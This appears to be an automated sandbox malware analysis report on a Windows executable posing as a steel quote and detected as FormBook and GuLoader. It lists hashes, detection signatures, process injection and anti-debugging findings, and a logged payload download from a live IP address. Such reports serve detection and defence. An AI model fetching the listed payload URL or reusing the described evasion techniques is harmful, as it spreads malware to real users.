Windows Analysis Report
Steel Sample- QUOTE.exe

Overview

General Information

Sample name: Steel Sample- QUOTE.exe
Analysis ID: 1629363
MD5: 1a0611d6fad6a80c0369a33c2e09f52a
SHA1: a66e801bc37c50f675fa9f98864caf292052900d
SHA256: 1d9fbcb6a4f1688a020b56a5d82e29498f8b2c22c6e6c04bdf1ffcbfd80b65da
Tags: exeuser-lowmal3

Detection

FormBook, GuLoader
Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Steel Sample- QUOTE.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)
    • Steel Sample- QUOTE.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5576 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\6598NWeXn4d.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 4888 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\Go8zzyHYSzv.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5076 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\FFwqjpuGr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5628 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\XkMQicXLAokJ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
            No Sigma rule has matched
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2025-03-04T16:54:15.595898+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 63713 | 196.251.86.79 | 80 | TCP

            AV Detection

            Source: Steel Sample- QUOTE.exe, Virustotal: Detection: 23%
            Source: Steel Sample- QUOTE.exe, ReversingLabs: Detection: 28%
            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Steel Sample- QUOTE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2962917710.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2962988596.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000011.00000000.2753551476.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000012.00000000.2873144572.00000000001AF000.00000002.00000001.01000000.00000008.sdmp
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: global traffic, TCP traffic: 192.168.2.4:63695 -> 162.159.36.2:53
            Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:63713 -> 196.251.86.79:80
            Source: global traffic, HTTP traffic detected: GET /vHTwkXp255.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0; Host: 196.251.86.79; Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297486628.0000000005056000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.0000000005054000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.0000000005054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/R
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3330181036.00000000346F0000.00000004.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.bin
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.binr
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.binx
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.biny
            Source: Steel Sample- QUOTE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

            E-Banking Fraud

            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk,6_2_352835C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_35282DF0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_35282C70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282B60 NtClose,LdrInitializeThunk,6_2_35282B60
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283010 NtOpenDirectoryObject,6_2_35283010
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283090 NtSetValueKey,6_2_35283090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283D10 NtOpenProcessToken,6_2_35283D10
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283D70 NtOpenThread,6_2_35283D70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352839B0 NtGetContextThread,6_2_352839B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35284650 NtSuspendThread,6_2_35284650
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File created: C:\Windows\resources\Bementite.ini
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 35297E54 appears 71 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 35285130 appears 44 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 3523B970 appears 188 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 352CF290 appears 42 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 352BEA12 appears 48 times
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000354E1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.0000000035197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034FE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal80.troj.evad.winEXE@3/9@0/1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File created: C:\Users\user\AppData\Roaming\Rigsantikvarernes
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File created: C:\Users\user\AppData\Local\Temp\nsr4243.tmp
            Source: Steel Sample- QUOTE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Steel Sample- QUOTE.exeVirustotal: Detection: 23%
            Source: Steel Sample- QUOTE.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File read: C:\Users\user\Desktop\Steel Sample- QUOTE.exe
            Source: unknown, Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File written: C:\Users\user\AppData\Roaming\Rigsantikvarernes\anticipatively.ini
            Source: Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2962917710.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2962988596.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000011.00000000.2753551476.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000012.00000000.2873144572.00000000001AF000.00000002.00000001.01000000.00000008.sdmp

            Data Obfuscation

            Source: Yara match, File source: 00000006.00000002.2962810507.0000000002234000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2215456819.0000000005564000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_3521135D push eax; iretd 6_2_35211369
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_352127FA pushad ; ret 6_2_352127F9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, File created: C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, API/Special instruction interceptor: Address: 57219D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, API/Special instruction interceptor: Address: 23F19D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, RDTSC instruction interceptor: First address: 56E4548 second address: 56E4548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCEA88846A5h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, RDTSC instruction interceptor: First address: 23B4548 second address: 23B4548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCEA8C56995h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_352BD1C0 rdtsc 6_2_352BD1C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, API coverage: 0.3 %
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Last function: Thread delayed
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.000000000505C000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297486628.000000000505C000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.000000000505C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW(
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, API call chain: ExitProcess graph end node, graph_0-4483
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, API call chain: ExitProcess graph end node, graph_0-4489
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_352BD1C0 rdtsc 6_2_352BD1C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk, 6_2_352835C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe, Code function: 6_2_352FB52F mov eax, dword ptr fs:[00000030h] 6_2_352FB52F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]6_2_352C368C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]6_2_3526D6E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]6_2_3526D6E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FD6F0 mov eax, dword ptr fs:[00000030h]6_2_352FD6F0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
